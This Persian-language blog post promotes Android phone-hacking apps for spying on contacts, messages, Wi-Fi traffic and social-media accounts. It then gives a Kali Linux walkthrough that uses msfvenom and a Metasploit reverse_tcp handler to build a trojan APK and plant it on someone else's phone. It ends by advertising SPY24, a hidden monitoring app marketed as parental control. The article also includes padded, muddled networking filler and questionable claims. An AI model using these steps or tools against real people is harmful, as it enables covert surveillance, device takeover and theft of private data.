 نرم افزار AndroidRAT جزو بهترین نرم افزار های هک موبایل های اندروید می باشد, بخش اول نام این نرم افزار RAT  به معنی کنترل از راه دور می باشد و از کلمه Remote Administrative Tool گرفته شده است و قسمت دوم آن نیز نمایانگر سیستم عامل اندروید می باشد. پس به سادگی از نام این نرم افزار, کاربرد آن برای شما مشخص می گردد که وظیفه آن کنترل در فضای اندروید می باشد. اگر این اپ را بر روی گوشی مورد نظر نصب کنید, اطلاعاتی از جمله مخاطبین، لیست تماس ها، پیامک ها، لوکیشن ها  و موارد مشابه را به شما خواهد داد. علاوه بر موارد یاد شده می توانید از امکاناتی مثل عکس گرفتن, فیلم برداری و تماس تلفنی و موارد این چنینی را نیز از راه دور اجرا کنید. پس در شرایطی که می خواهید یک نرم افزار هک موبایل اندروید داشته باشید نرم افزار AndroidRAT بهترین گزینه برای شما خواهد بود.

دانلود نرم افزار AndroidRAT

هک کل گوشی

نرم افزار Hackode بهترین نرم افزار هک موبایل اندروید

این نرم افزار به تازگی وارد این عرصه شده است و کار اصلی Hackode هک کردن موبایل های اندروید می باشد. در حال حاظر حدود 1 سال از انتشار این نرم افزار می گذرد. کاربرد های این نرم افزار بسیار است و می توانید هک بر مبنای حملات SQL, MySQL Server, آیپی و مواد مشابه انجام دهد. به عبارت بهتر این نرم افزار بیشتر از هک گوشی های اندروید است و قابلیت های بسیار زیادی را در خود جای داده است. در قسمت زیر می توانید نرم افزار Hackode را به صورت رایگان دانلود نمایید.

نرم افزار cSploit بهترین نرم افزار هک موبایل اندروید

نرم افزار بعدی cSploit نام دارد و جزو 10 نرم افزار برتر در میان برنامه های هک قرار داده شده است. تولید کنندگان این نرم افزار ادعا کرده اند که در این صنعت بهترین می باشند و بهترین امکانات بر روی این نرم افزار قرار داده شده است به عنوان مثال: پیدا کردن رمز ها , رمز وای فای و تغییر رمز عبور آن, دریافت اطلاعات هاست های محلی جزو امکانات این نرم افزار می باشد. پس در صورتی که به نرم افزار های هک گوشی علاقه دارید حتما از نرم افزار cSploit استفاده کنید.

نرم افزار FaceNiff بهترین نرم افزار هک موبایل اندروید

در صورتی که علاقه به هک کردن و به دست آوردن اطلاعات در زمینه شبکه های اجتماعی مثل فیسبوک و توییتر و موارد مشابه به آن را دارید, می توانید از FaceNiff استفاده نمایید. هدف اصلی این نرم افزار برای هک و دسترکاری در انواع گوشی های اندروید و یا اختلال در وای فای های مجاور می باشد. در شرایطی که نیاز داشته باشید می توانید از FaceNiff برای جاسوسی و بدست آوردن اطلاعات نیز استفاده نمایید. یکی از امکانات خوب این نرم افزار بدست آوردن کوکی ها یی مروبط به وای فای می باشد. پس یکی از بهترین نرم افزار هک موبایل اندروید FaceNiff می باشد.

نرم افزار Shark for Root بهترین نرم افزار هک موبایل اندروید

در صورتی که به دنبال نرم افزاری حرفه ای در زمینه هک موبایل های اندروید هستید Shark for Root می تواند برای شما گزینه ای عالی باشد. این نرم افزار به عنوان جاسوسی داده های ای فای عمل می کند. این نرم افزار بر روی شبکه های وای فای و یا 3G  FroYo Tethered قابلیت استفاده را دارد. اما برای استفاده از این نرم افزار گوشی خود را باید روت کرده باشید و از دستورات tcpdump استفاده کنید تا این نرم افزار عملیاتی شود. پس در صورتی که شما به دنبال یک نرم افزار هک حرفه ای برای ترافیک اسپینر هستید, نرم افزار Shark for Root برای شما می تواند بهترین گزینه برای این کار باشد.

نرم افزار Droidsheep  بهترین نرم افزار هک موبایل اندروید

نرم افزار Droidsheep   به وسیله کارشناسان امنیتی طراحی شده است و وظیفه این نرم افزار هک کردن شبکه های وای فای و جاسوسی در داخل شبکه می باشد. به دلیل اینکه به وسیله کارشناسان امنیتی این نرم افزار پیاده سازی شده است جزو بهترین نرم افزار های هک موبایل اندروید محصوب می شود. یکی از ویژگی های خوب این نرم افزار سازگاری آن با تمامی سایت ها و شبکه های اینترنتی ست. Droidsheep   به دلیل رایگان بودنش و سادگی که دارد در میان نرم افزار های هک اندروید محبوبیت پیدا کرده است. با استفاده از این نرم افزار شما می توانید اطلاعات شبکه های اجتماعی مثل فیس بوک, توییتر و موارد مشابه را بدست آورید.

نرم افزار DroidBox  بهترین نرم افزار هک موبایل اندروید

نرم افزار DroidBox از بقیه نرم افزار های هک متفاوت می باشد و این اپلیکیش برای آنالیز و تجزیه و تحلیل زنده اپلیکیشن های موجود بر روی گوشیست. در کنار ویژگی اصلی که این نرم افزار دارد, توانایی جاسوسی در شبکه های وای فای را نیز پشتیبانی می کند. به عبارت دیگر از DroidBox می توانید برای ردیابی و زیر نظر گذاشتن اطلاعات کاربران در یک شبکه اینترنتی استفاده کنید و اکانت های فیس بوک و یا هر سایت دیگری را می توانید هک کنید. علاوه بر آن امکان دسترسی به مواردی مثل اس ام اس ها, شماره تماس ها, لیست مخاطبین موبایل و غیره را نیز دارد.

نرم افزار APKInspector  بهترین نرم افزار هک موبایل اندروید

نرم افزار APKInspector جزو نرم افزار های ویژه ست که این امکان را برای شما مهیا می کند تا با استفاده از مهندسی معکوس به ویژگی های گرافیکی و آنالیزی کاربران دست پیدا کنید, در واقع یک دید جامع و کلی از شرایط را برای شما فراهم می کند. کار دیگر APKInspector این می باشد که سورس کد های نرم افزار های دیگر گوشی موبایل ها برای شما پیدا خواهد کرد. نرم افزار APKInspector برای افرادی که به دنبال هک و جاسوسی به روش های تخصصی و حرفه ای در زمینه اندروید می باشند بسیار کاربردی ست.

نرم افزار Nmap  بهترین نرم افزار هک موبایل اندروید

در رده بندی بهترین نرم افزار های هک گوشی های موبایل اندروید نرم افزار Nmap یکی از محبوب ترین و بهترین این نرم افزار هاست. ویژگی مثبت این نرم افزار سازگاری آن با کامپیوتر های شخصی و موبایل های اندروید است. با نصب این نرم افزار بر روی موبایل خود می توانید به شبکه های وای فای خود نفوذ کنید و به این شکل اطلاعات کاربران را سرقت نمایید. لازم به ذکر است برای استفاده از این نرم افزار, گوشی های روت شده و یا روت نشده می توانند از این نرم افزار استفاده نمایند. استفاده از امکانات این نرم افزار بسیار ساده طراحی شده است و کاربر می تواند به سادگی با آن ارتباط برقرار کند و برای افراد تازه کار در هک می تواند بسیار مفید باشد.

 نرم افزار SSHDroid  بهترین نرم افزار هک موبایل اندروید

نرم افزار SSHDroid برای ساخت سرور SSH می باشد و برای موبایل های اندروید به روز رسانی شده است و این امکان را به افراد می دهد تا از موبایل اندروید خود به کامپیوتر شخصی خود اتصال پیدا کنند و دستوراتی همانند terminal و adb shell را پیاده سازی کنند. در واقع با استفاده از این نرم افزار کاربر می تواند بسیاری از فایل ها را از راه دور ویرایش کند. برنامه SSHDroid برای کاربرانی که قصد دارند با استفاده از موبایل به کامپیوتر خود وصل شوند و کار هک را انجام دهند بسیار مناسب است.

نرم افزار Wi-Fi Kill  بهترین نرم افزار هک موبایل اندروید

همانطور که از اسم نرم افزار Wi-Fi Kill مشخص است این نرم افزار برای قطع و یا اختلال در شبکه های wi-fi می باشد. خود نرم افزار را می توانید بر روی موبایل هایی که سیستم عامل آن اندروید می باشد و دستگاه روت شده است نصب نمایید. وظیفه اصلی این نرم افزار ایجاد اختلال در ارسال و دریافت اطلاعات در شبکه وای فای می باشد. برنامه Wi-Fi Kill بسیار ساده و کاربر پسند ساخته شده است و افراد مبتدی در کار هک نیز می توانند به سادگی از این نرم افزار استفاده کنند.

نرم افزار Fing Network Scanner بهترین نرم افزار هک موبایل اندروید

نرم افزار Fing Network Scanner با توجه به نامی که دارد برای اسکن کردن شبکه های بیسیم و وای فای عمل می کند.  با استفاده ازاین نرم افزار می توانید به صورت دقیقی یک شبکه را بررسی کنید که چه دستگاهایی به آن متصل شده اند و علاوه بر آن اطلاعات کاملی از جزئیات دستگاه هایی که به این شبکه متصل می باشند را به شما نمایش خواهد داد. شما می توانید اطلاعات رد و بدل شده بین شبکه و دستگاه را نیز از این روش بدست آورید . Fing Network Scanner یک نرم افزار بسیار ساده و راحت می باشد و هر کاربری می تواند از آن استفاده کند.

نرم افزار USB Cleaver  بهترین نرم افزار هک موبایل اندروید

نرم افزار USB Cleaver جزو کاربردی ترین برنامه های هک می باشد و برای کسب اطلاعات در کامپیوتر های رومیزی استفاده می شود. لازم به ذکر است این نرم افزار توانایی بدست آوردن اطلاعاتی مثل رمز های عبور سایت ها, رمز عبور وای فای, رمز عبور شبکه های متصل شده به کامپیوتر و موارد مشابه را دارد. محیط کاربری USB Cleaver زیاد پیچیده نیست و هکران متوسط با این نرم افزار می توانند به صورت بسیار ساده ای ارتباط برقرار کنند.

نتیجه گیری: در این مقاله به شما تعداد بسیار زیادی از نرم افزار های جاسوسی و هک موبایل های انروید  را معرفی کردیم, هر کدام از این نرم افزار ها دارای ویژگی های کاربردی خود بودند ولی در اکثر موارد این نرم افزار ها توانایی ایجاد اختلال و یا وارد شدن در شبکه وای فای را دارا بودند و با استفاده از امکانات آن می توانستید به رمز های عبور کاربران دست پیدا کنید. لازم به ذکر است این نرم افزار های هک برای یادگیری و آموزش در این پست قرار داده شده اند و برای مقاصد بد از آنها استفاده نکنید.

آموزش کالی لینوکس و آموزش هک گوشی اندروید به وسیله کالی لینوکس

با سلام در این مقاله سعی خواهیم کرد تا آموزش های مربوط به استفاده از کالی لینوکس را به شما ارائه دهیم تا با آن بتوانید هر گوشی اندرویدی را هک کنید.

کالی لینوکس چیست؟

همانطور که مشخص می باشد کالی لینوکس گرفته شده از لینوکس در راستای امنیت و تست نفوذ می باشد. در واقع کالی لینوکس یک سیستم عامل بر پایه لینوکس است و نسخه توسعه یافته ای از Backtrack میتوان آن را شناخت و دیگر به روز رسانی نخواهد شد.

این سیستم عامل بر اساس دیان پایه ریزی گردیده, در دو نوع نسخه پیشرفته و یک نسخه ساده منتشر گردیده است. علاوه بر آن یک نسخه برای گوشی های همراه و یک نسخه برای فلش ها نیز ارائه گردیده است.

باید بدانید همواره لینوس رایگان می باشد و به عبارت بهتر, کالی لینوکس به صورت سورس باز منتشر گردیده است تا کاربران حرفه ای از امنیت آن اطمینان پیدا کنند. باید بدانید این سیستم عامل برای استفاده های روزمره و سیستم عامل اول مناسب نیست و بهتر است از آن برای تست های نفوذ استفاده نمایید.

استفاده از کالی لینوکس برای راحتی کار شما

این سیستم عامل خود به خود برای راحتی کار شما می باشد و در واقع در داخل خود کالی لینوکس ابزار ها و آپشن های توزیع شده بسیاری مصل UBUNTU موجود می باشد. از طرفی نیز به دلیلی نصب تعداد بالای این امکانات شاید در ابتدای کار شما را گیج نماید. اما به یاد داشته باشید که تمامی این امکانات تست نفوذ و امنیت به صورت رایگان برای شما آماده اند و این خود یکی از بهترین کاربرد های این نرم افزار می باشد. به عبارتی کالی لینوکس برای کار های تست امنیت بسیار کاربردی ست.

برای شروع صفحه ترمینال را باز کنید و شروع به تایپ دستورات زیر نمایید: با استفاده از این دستورات می توانید گوشی مورد نظر را هک نمایید.

msfvenom -p android/meterpreter/reverse_tcp lhost=(YOUR IP) lport=(YOUR PORT NUMBER) R > (YOUR VIRUS NAME)

بعد از انجام دادن مرحله اول باید در قسمت locahost  آیپی IP لینوکس خود را اضافه کنید. در ادامه باید در قسمت lport شماره پورت را وارد نماید و در نهایت اسم تروجان که قرار است ساخته شود را وارد نمایید. با این کار سیستم به شما یک برنامه با فرمت apk (که قابلیت نصب برروی گوشی اندروید را دارد) را ارانه می دهد

IP چیست؟

آی پی یکی از اصطلاحات اولیه ای ست که در دنیای شبکه و کامپیوتر از آن استفاده می شود. باید بدانید که این کلمه از Internet Protocol آمده است. آی پی را میتوان به عنوان کد یا آدرس هر دستگاهی که به اینترنت متصل شده است دانست. بدون دانستن آدرس آی پی می توانید به کار در اینترنت ادامه دهید و به عبارتی این آدرس تنها برای افراد متخصص کاربرد دارد. ولی به عنوان اطلاعات عمومی می تواند ذهن شما را برای عمق اینترنت آشنا کند.

آی پی در شبکه معنا پذیر می باشد

در ابتدا باید بدانید که آی پی به تنهایی معنا پذیر نیست و در زمانی که دستگاه به شبکه ای متصل است معنا دارد. به عبارت بهتر کلمه آی پی در شبکه معنا دارد و در زمانی که از آی پی سخن می گوییم بحث ما مربوط به زیر ساخت های شبکه می باشد و به سایت و یا نرم افزار ها و اینترنت مربوط نیست.

در شرایطی که شما 2 کامپیوتر را به صورت شبکه ای به هم متصل کنید هر یک از این کامپیوتر ها داری یک آیپی یا آدرس خواهند بود. همین کار را در سطح دنیا گسترش دهید و به عبارتی تمامی کامپیوتر ها و موبایل ها را وارد شبکه ای مثل اینترنت وارد کنید باز هم این هر دستگاه نیازمند یک آدرس یکتا به نام آیپی می باشد.

برای اتصال نرم افزار ها و یا موبایل ها با یکدیگر نیز این آدرس ها هستند که ارتباط را برقرار می کند.

علاوه بر مورد یاد شده ارتباط میان نرم افزار و سرور به وسیله همین آدرس آی پی امکان پذیر می باشد.

هر سایت و یا به عبارتی وب گاهی که در ارتباط با هم می باشند نیز با کمک از همین آدرس دهی ها می توانند کار خود را جلو ببرند . پس IP در تمامی شبکه های داخلی و فرا داخلی وجود دارد و به عنوان یک مفهوم زیر ساختی در دنیای شبکه می باشد.

PORT  به چه معناست؟ چه وظیفه ای دارد؟ مهمترین پرت های کدامند؟ چه تعداد پورت داریم؟

در ابتدا بد نیست بدانید که 65536 عدد پرت وجود دارد که عدد پرت ها از 0 شروع شده و در نهایت 65535 به پایان میرسد. بعضی از این پورت ها به وسیله سازمان IANA رزور شده اند و به عبارتی خصوصی اند. معروفترین پورت های جهان عبارتند از:

پروتکل شماره Port
HTTP ۸۰
HTTPS ۴۴۳
FTP ۲۱
DNS ۵۳
Remote Desktop ۳۳۸۹
Telnet ۲۳
ورود به CPanel ۲۰۸۲

در صورتی که علاقه دارید لیست کامل تری از این پورت ها را ببینید می توانید وارد لینک زیر شوید:

ipconfig چیست؟

در صورتی که میخواهید آی پی خود را بدست آورید می توانید از طریق CMD کامپیوتر خود دستور ifconfig را تایپ کنید و بعد از آن آی پی سیستم شما نمایش داده خواهد شد.

راهنمای استفاده از ipconfig در لینوکس

در سیستم عامل هایی مثل: یونیکس ، لینوکس و مکینتاش شما به جای استفاده از دستور ipconfig باید از دستور ifconfig استفاده نمایید. در صورتی نیاز به مطالعه راهنمای مربوط به این دستور را دارید می توانید ifconfig –help را وارد نمایید و در نهایت خروجی دستور به صورت زیر خواهد بود.

eth0  Link encap:Ethernet  HWaddr 00:60:08:17:63:A0

inet addr:192.168.1.101  Bcast:192.168.1.255 Mask:255.255.255.0

UP BROADCAST RUNNING  MTU:1500 Metric:1

RX packets:911 errors:0 dropped:0 overruns:0 frame:0

TX packets:804 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:100

Interrupt:5 Base address:0xe400

lo    Link encap:Local Loopback

inet addr:127.0.0.1  Mask:255.0.0.0

UP LOOPBACK RUNNING  MTU:3924 Metric:1

RX packets:18 errors:0 dropped:0 overruns:0 frame:0

TX packets:18 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

باید بدانید این دستور آیپی شما,  subnet mask و default gateway برای کارت شبکه های محلی و loopback را به شما ارائه خواهد داد ولی اطلاعات مربوط به شرایط dhcp را به شما ارائه نمی دهد. در صورتی نیاز می توانید از دستور “pump s” در این زمینه استفاده کنید . این دستور آی پی آدرس شبکه ای را که با DHCP و DNS   تنظیم گردیده است را release و renew می توانید کنید.

در این مرحله خواهید دید که تروجان ایجاد شده است, در شرایطی که دستورات را به صورت صحیحی وارد کرده باشید تروجان شما ساخته خواهد شد. در واقع شما تروجان خود را ساخته اید و آماده منتقل کردن آن به گوشی اندروید فرد دیگری هستید. 

در نهایت باید صفحه ترمینال خود را باز کنید و از دستور msfconsole استفاده کنید و بعد از آن دکمه Enter را بزنید. 

معرفی متااسپلویت ؟

در مقاله های قبلی درباره مفاهیم بسیار زیادی مثل اکسپلویت گفتیم, در این مقاله ما سعی خواهیم کرد تا شما را با مفهوم متااسپلویت آشنا کنیم و کاربرد های آن را به شما آموزش دهیم.

متااسپلوییت فریمورکی open source می باشد. این فرمیمورک به صورت حرفه ای نوشته شده است و کارشناسان تست نفوذ, هکر ها و فعالان در این زمینه می توانند از آن استفاده کنند. این فریمورک می تواند با استفاده از حفره های امینی در سیستم ها و یا شبکه ها و نرم افزار ها به آنها نفوذ کنید. این برنامه در حال اولیه خود دارای تعداد زیادی اکسپلوییت است, اما در صورت نیاز خودتان هم می توانید اکسپلوییت های مورد نیاز را بدست آورید.

لازم به ذکر است که افراد مبتدی نمی توانند از این فریمورک استفاده کنند و کارشناسان امنیتی و مدیران شبکه و اشخاص برنامه نویس می توانند از امکانات متااسپلوییت استفاده نمایند. به عبارت بهترین این کارشناسان امنیتی و متخصصان تست نفوذ در فاز های جمع آوری اطلاعات و تست می توانند از این فریمورک به بهترین شکل استفاده کنند. 

توسعه دهنده متااسپلوییت

سازنده ی اصلی متااسپلوییت اچ دی مور HD Mooreنام دارد, HD Moore جزو کارشناسان حرفه ای در زمینه امنیت و تست نفوذ می باشد و به همین دلیل او فریمورک متااسپلوییت را به صورت اپن سورس ایجان کرده است.

پس از باز کردن برنامه به صورت عکس زیر صفحه ای برای شما باز  میگردد. در ادامه به بخش کنترل کردن گوشی که هک نموده ای خواهیم پرداخت.

use exploit/multi/handler

در ادامه برای استفاده از تروجان که ساخته اید , باید دستورات مورد نیاز که در قسمت بالا برای شما نوشته ایم را تایپ نمایید. با استفاده از این دستورات کنترل گوشی مورد نظر در دستان شما خواهد بود.

set payload android/meterpreter/reverse_tcp

بعد از آن زمان آن میرسد تا ترجان خود را تنظیم نمایید. برای این کار می توانید از دستوران زیر استفاده کنید.

set lhost (YOUR IP) set lport (YOUR PORT NUMBER) exploit

در قسمت مورد نظر آیپی خود را بزنید

service apache2 start

با دیدن این پیام زمان آن میرسد تا تروجان را بر روی موبایل مورد نظر نصب کنید. با قرار دادن تروجان در گوشی برای اولین بار می توانید از سرویس Apache Apache Linux استفاده نمایید.

برای استفاده درست از سرویس Apache باید سرویس هایی را فراخوانی کنید که در قسمت بالا دستورات آن آورده شده است و در عکس نیز مشخص گردیده است.

در ادامه باید تروجان خود را از سرور دانلود کنید و در موبایل مورد نظر اینستال کنید. پس از آن باید تروجان مورد نظر را اجرا کنید.

در نهایت خواهید دید که گوشی به لینوکس متصل گردیده است و این به این معناست که تروجان که به صورت درست کار می کند و میتوانیم به وسیله آن میتوانیم اطلاعات گوشی را مشاهده کنیم. 

تروجان چیست؟

تروجان ها همواره نرم افزار هایی مخرب و آلوده می باشند که در ابتدا به نظر یک برنامه جذاب اند, ولی در واقعیت وسیله ایست که کار آن آسیب رساندن به شما ست. تروجان دارای انواع مختلفی می باشد و یکی از آن همانند برنامه ای ست که ادعا می کند در برابر ویروس ها شما را حفاظت می کند ولی در عمل ویروس ها را با سیستم شما آشنا می کند.

اسم تروجان از یک افسانه یونانی گرفته شده است, که به احتمال زیاد فیلم آن را دیده اید. در یونان به وسیله هدیه ای به شکل اسب بسیار بزرگ چوبی توانستند به قلعه دشمن وارد شوند و به این صورت قلعه دشمن را از آن خود نمایند. همین کار را تروجان با کامپیورت شما خواهد کرد. در واقع در ابتدا شما را گول میزند و پس از آشنایی با کامپیوتر شما شروع به آسیب رساندن به سیستم می کند.

در ادامه این مقاله معروفترین تروجان ها به همراه روش کار آنها را بررسی خواهیم کرد.

تروجان RAT 

این تروجان برای بدست گرفتن دسترسی کامل سیستم پیاده سازی شده است و در واقع سیستم قربانی به صورت کامل در دست هکر قرار خواهد گرفت. در بسیاری از موارد هکر ها این تروجان را در داخل فایل های بزرگی مثل بازی ها و یا برنامه های کوچک پنهان می کنند و در زمان مناسب سیستم را مورد تهاجم قرار خواهند داد.

تروجان مخرب

همانطور که از اسم این تروجان مشخص است وظیفه آن تخریب می باشد.  کار اصلی آن حمله به فایل های اصلی و یا حذف فایل ها می باشد, از نظر کارکرد این تروجان شبیه به ویروس های کامپیوتری ست و در صورتی که آنتی ویروس شما به روز نباشد این تروجان قابل شناسایی نمی باشد.

تروجان پروکسی

این تروجان برای مصارف پیچیده تری پیاده سازی شده است و در سیستم قربانی نفوذ خواهد کرد و سیستم مورد نظر را همانند یک پروکسی سرور تغییر می دهد. در این شرایط مهاجم می تواند از سیستم مورد نظر برای انجام حمله از سیستم شما استفاده نماید و در واقع کار های کلاهبرداری و فعالیت های غیر قانونی خود را از این طریق پیش خواهد برد.

تروجان‌های  FTP

FTP در کامپیوتر برای ارسال و دریافت فایل ها استفاده می شود و این تروجان وظیفه دارد تا پورت 21 یا همان پورت ارسال اطلاعات رایانه را باز کند و به این صورت ارسال و دریافت فایل ها از سیستم شما برای مهاجم مهیا می شود.

تروجان مختل کننده در برنامه های امنیتی

این تروجان بسیار مخرب و خطرناک می باشد و کار اصلی این تروجان ایجاد اختلال در برنامه های امنیتی مثل آنتی ویروس, فایروال و برنامه های این چنینی می باشد. در اکثر موارد این تروجان با بقیه تروجان ها ارتباط برقرار می کند و در نهایت آسیب بسیار شدیدی را به سیستم وارد خواهد نمود.

کلام آخر: با توجه به تمامی مواردی که در قسمت های پیش به شما آموزش دادیم, متوجه شدیم که اطلاعات سیستم ما می تواند به سادگی با دانلود غیر استاندارد به وسیله یک بازی یا برنامه مورد حمله قرار گیرد. پس بهتر است برای امنیت خود در زمان دانلود به سایت های با اعتبار مراجعه کنید و سیستم های امنیتی خود را به روزرسانی کنید.

هک موبایل با استفاده از نرم افزار SPY24 به صورتضمینی

SYP24 یک نرم افزار برای مراقبت از خانواده طراحی شده است, این نرم افزار قابلیت نصب بر روی موبایل را دارد و طراحی آن بسیار ساده انجام گرفته است تا والدین بتوانند به سادگی فعالیت های کودکان خود را زیر نظر بگیرند. در ادامه ما امکانات نرم افزار SPY24  را برای شما معرفی کرده ایم:

  • کنترل کامل بر اس ام اس ها, تماس ها به همراه زمان و تاریخ
  • کنترل بر روی پیام های موجود در نرم افزار هایی مثل تلگرام, اینستاگرام و غیره
  • مکان یابی گوشی و گزارش از مسیر هایی که وی پیموده است
  • گزارش دقیق از وب سایت هایی که باز شده اند
  • امکان پنهان سازی از کاربر و فعالیت برنامه به صورت پنهان
  • امکان محدود سازی و در واقع فیلتر کردن مخاطبین,سایت ها و یا برنامه ها 

هک گوشی با imei چگونه انجام می شود ؟

روش های زیادی برای هک گوشی دیگران وجود دارد اما راحت ترین آنها روشی است که امکان دسترسی به گوشی فرد مورد نظر وجود داشته باشد و بتوان نرم افزار هک را روی موبایل وی نصب کرد. این روش به دلیل پیچیدگی کم و نیاز نداشتن به دانش برنامه نویسی، ساده ترین روش نامیده می شود. اما اگر بخواهید بدون دسترسی به گوشی فرزند و یا اعضای خانواده یا افراد دیگر، اطلاعات گوشی آن ها را به دست آوریم، باید بدانید که این کار قدری به دانش برنامه نویسی شما نیاز دارد.
چنانچه فردی بخواهد بدون دسترسی به گوشی هدف، او را هک کند باید حداقل یک سال به کسب دانش برنامه نویسی و موضوعات امنیتی بپردازد.
اما :
خوشبختانه برنامه نویسان موفق دنیا با تلاش های فراوان، نرم افزارهایی را برای هک با imei طراحی و عرضه نموده اند. با استفاده از این برنامه ها شما به راحتی می توانید هک گوشی فرد موردنظرتان را فقط با داشتن شماره تلفن و سریال گوشی(imei) انجام دهید.

واقعی نیست!!!! پاسخ سوال ویس صدا!!

برنامه SPY24 :

که اولین مورد از قوانین سایت و مهمترین آن مقابله با هک میباشد و هر گونه سو استفاده و استفاده نادرست از آموزش ها و برنامه های وبسایت SPY24 بر عهده کاربر می باشد.

سامانه مراقبت از خانواده (SPY24) نام یک نرم افزار موبایل با نصب و فعال‌سازی بسیار ساده می باشد که به والدین امکان کنترل و مدیریت فعالیت فرزندان در شبکه های مجازی موبایلی را می دهد.

در زیر می توانید برخی از امکانات برنامه SPY24 را مشاهده نمایید:

  • نظارت بر تماس ها و پیامک ها به همراه تاریخ و زمان
  • گزارش پیام های تلگرام ، اینستاگرام ، واتس اپ و…
  • موقعیت لحظه مستمر و مسیر های پیموده شده
  • وب سایت های بازدید شده و برنامه های اجرا شده
  • با قابلیت پنهان سازی ۱۰۰ درصد برنامه و مدیرت راه دور
  • امکان مسدود سازی وب سایت ها، برنامه ها و مخاطبین از راه دور
برنامه کنترل اندوید
برنامه کنترل آیفون
دانلود برنامه SPY24

keleis andre

برنامه ردیابی و کنترل نامحسوس گوشی موبایل و تبلت از راه دور

یک دیدگاه

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا